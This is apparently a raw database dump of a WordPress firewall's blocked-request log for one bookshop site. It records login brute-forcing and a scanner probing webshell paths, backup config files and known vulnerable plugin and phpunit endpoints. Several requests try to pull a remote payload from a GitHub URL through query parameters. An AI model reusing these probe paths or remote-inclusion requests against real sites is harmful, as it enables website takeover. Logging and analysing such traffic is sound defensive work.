Firefox\\/3.0.16 FBSMTWB\"}','2RgnH1tDm6KYdTr8wMBCzeSZ',0,1637216428.5177,430,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','JHcTiw8t0mvCEopWYIZnfyQM',0,1637216429.8149,383,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','DYuflbTQ1j2zHKJPmUpLgFWB',0,1637216431.2211,387,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','CKp7VqPj6OSBE1ltLHR3o90m',0,1637216432.7188,411,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mQd5EwftGU21cX9OCSy0JiWk',0,1637216433.9884,421,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','utWTdJESxF4k9GIKCzV5o6A8',0,1637216435.3182,397,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','02etZQGTDExK6MSks4cqz8mw',0,1637216436.9085,432,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Jz3SrH1YPQMfuDpFVGxTlNZC',0,1637216438.4307,401,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','kIKt4JRWVla6oQrLbPS9GOi0',0,1637216440.1277,945,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Y7SEkLIc50pFyXjKV4OiDP1m',0,1637216442.3225,374,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','jlNp5JbaBUDoh7eQzZMY6u2f',0,1637216443.7199,400,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','XjPpv2SuZYrQOs1i7q9JCbEc',0,1637216445.3021,406,'','POST',403,0,700,0,1,'',0),('95.217.144.72',1608093768,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','2HZVbXuQi9e6x5K7OYmgkI1R',0,1637216811.0031,502,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','KjCfehXkwl2s8YAcyTpnB7ZJ',0,1637218333.4110,482,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-content/plugins/akismet/class.akismet-https.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','ZYvlhaE23WLPmDtK5f6pMnoe',0,1637218635.2177,427,'','POST',403,0,700,0,1,'',0),('41.225.212.115',702665843,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','XUnWlIJT8g0jbqxOcH7dwvGi',0,1637219810.3338,400,'','GET',404,0,700,0,1,'',0),('103.121.89.72',1736005960,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','q8O2wUFM76LgxE5nJsb4HWIY',0,1637219933.9833,567,'','POST',403,0,600,0,1,'',0),('66.11.120.48',1108047920,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','LCcdE0i8b7xT45fwPueDVOKS',0,1637221500.1357,646,'','POST',403,0,600,0,1,'',0),('69.30.240.28',1159655452,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Ure1BPZVfIFatNcsSJzToWEk',0,1637221971.0161,487,'','POST',403,0,600,0,1,'',0),('87.106.169.145',1466608017,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','ErlQYtoehLbG54dknH0iwqyg',0,1637223020.6455,651,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','he5DtAzl3yIEFf14nibd69ZC',0,1637226810.6718,640,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vkb8aKQjNG62Opy7oisf5ZhY',0,1637226814.2100,488,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','S8TNYPCK9J4UVQdp1jheDF3t',0,1637226816.4840,424,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dkHylRFSvg5wDOzBnAQxU3eC',0,1637226820.4303,400,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Prb28scdUE03OK7HwvoDAGIF',0,1637226826.9271,745,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2NPxklntIiqecoYygFJrdvjB',0,1637226828.9313,369,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','a5MS2DxEwXVnK9cUPlQfO1j4',0,1637226831.1885,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aq46HwWAfoYdcTpyBIb7Zxjz',0,1637226833.5877,418,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hutwsjGF6RvqMIJZy7mT5df0',0,1637226839.3697,440,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aMkd0LxEQ7KjyAbuRTFWtSr3',0,1637226842.8084,396,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','oZLRUGvPHfabyeViJQBFcS3M',0,1637226844.1212,391,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qFIBA32ZVEkMliSrwcU4TCaO',0,1637226846.2646,392,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Ib3oiXWtAPqEm4UMrfJy7OKN',0,1637226848.5669,393,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6KXZ2UD5HRluhJbLGBvW8oTy',0,1637226851.2009,1438,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O9Psiqy4okSrlutHeVcjN50M',0,1637226854.2384,425,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','N8z0Wts2H9x34KRpLfceFoUQ',0,1637226856.7293,382,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','31h5oxapMFC7DcbwTdtO2A9r',0,1637226858.5020,410,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VRYLs4oeJ1KItiUcClDNFgjE',0,1637226860.6408,401,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AGutW0gvwZb8nKEQpz5dBVJx',0,1637226863.4166,361,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CNeX1PwFH9mguO4GtnZhqLd8',0,1637226865.7224,378,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qbQjWG025UeIrtFfxiBPwl3a',0,1637226867.9838,560,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','S7wyt9age6VkrNQ5IB8HPnoU',0,1637226870.2907,426,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Y54Aa0kIwHzrq8LSmGEuysUJ',0,1637226872.6814,450,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','M2yOILt7viB4qz0XbwkEmsn9',0,1637226874.9999,440,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sHEQrfCq7tBxh6yApZmWRe4w',0,1637226877.1340,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LNUwMivcXFa6GdOmhRbrxQVZ',0,1637226879.4403,369,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zYEn2VZHRtuBO76UvGSwikqb',0,1637226881.3299,397,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XISjeCBLryc9DkmuJtaRxbfg',0,1637226883.6672,383,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sulh19gxfQLn6Pq7TYFvHzM8',0,1637226886.3217,538,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vaM7j4KGVsA5fJdPe8cZrFQy',0,1637226888.6596,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QRipYtNg6X9rUy1qnKFedBDh',0,1637226891.0761,402,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xZCvo8Odyu9EVQLlXicfb4tD',0,1637226893.2630,429,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jQAhPLyadwixbuZ83YpJkenV',0,1637226895.6645,421,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PbNAm0MO3GeBHo1zr29RVJ8F',0,1637226898.4655,419,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ljKpUOd8eaCuBZ36wJqISN72',0,1637226901.7197,419,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0i96IaGLgmWorOwRuhzctDKA',0,1637226904.1142,391,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','POxAEmyawt2qfNXjdFKV75ig',0,1637226905.6259,398,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3EGDiKhJpu0gQtClwNan8sVH',0,1637226908.2421,425,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dGfIJNDUb3ycnw1hXzQsg47v',0,1637226909.9603,422,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','iaS941vCFRHxDjVrlbm0PzTn',0,1637226912.7229,422,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cS9rKl7ep3yoXkZT0ma6BhnU',0,1637226915.0318,401,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','E4D5MfvudFoKr1wPgG7xlCHb',0,1637226917.7006,389,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HIL54geprs6NQbW31UJafG8P',0,1637226920.3148,386,'','GET',403,0,700,0,1,'',0),('18.119.134.156',309823132,'','https://ashbooks.co.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\\/20100101 Firefox\\/94.0\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','MY3aHBVqyk2lAORcpZSv7xs8',0,1637226977.3489,222,'','GET',403,0,520,0,1,'',0),('208.109.54.127',3496818303,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','gazONY8STMi1AXrQIo7ZsvpU',0,1637227557.0769,590,'','POST',403,0,600,0,1,'',0),('202.172.26.53',3400276533,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','ed97ZrLVKOU02sygG8px3lJk',0,1637229216.4519,503,'','POST',403,0,600,0,1,'',0),('139.59.118.238',2335930094,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','FDUOCAiZbPne0IqsMj68dYN2',0,1637230900.8885,419,'','POST',403,0,600,0,1,'',0),('204.12.198.244',3423389428,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','D1oe0cYtjGqbNgs7QECSdhLw',0,1637236843.9687,201,'','POST',403,0,600,0,1,'',0),('162.214.190.209',2731982545,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','IoarhUvb4Q8BkXjxZiMqn51w',0,1637241991.7825,1901,'','POST',403,0,600,0,1,'',0),('188.162.89.20',3164756244,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','Xa7yhHJpP5Tli8SdVBx09mcb',0,1637242561.3865,720,'','POST',403,0,600,0,1,'',0),('222.252.97.73',3741081929,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','BT0uaM6ybCp1J7XUevgS4R8Q',0,1637242565.3855,726,'','POST',403,0,600,0,1,'',0),('189.56.166.5',3174606341,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','1XrSChBRLQuPHiONdm4vAK3D',0,1637242647.2007,452,'','POST',403,0,600,0,1,'',0),('201.251.127.123',3388702587,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','QlRbOoL4YFu3hZzMIxk9aq1C',0,1637242680.9123,2345,'','POST',403,0,600,0,1,'',0),('85.227.82.3',1440961027,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','KeiY3kvyS6OdUN75bJIXj0lB',0,1637242695.0170,1723,'','POST',403,0,600,0,1,'',0),('202.165.236.204',3399871692,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','d9akPZ2fg5A7TQmK0zuGyS6X',0,1637242769.1336,718,'','POST',403,0,600,0,1,'',0),('143.198.179.234',2412164074,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 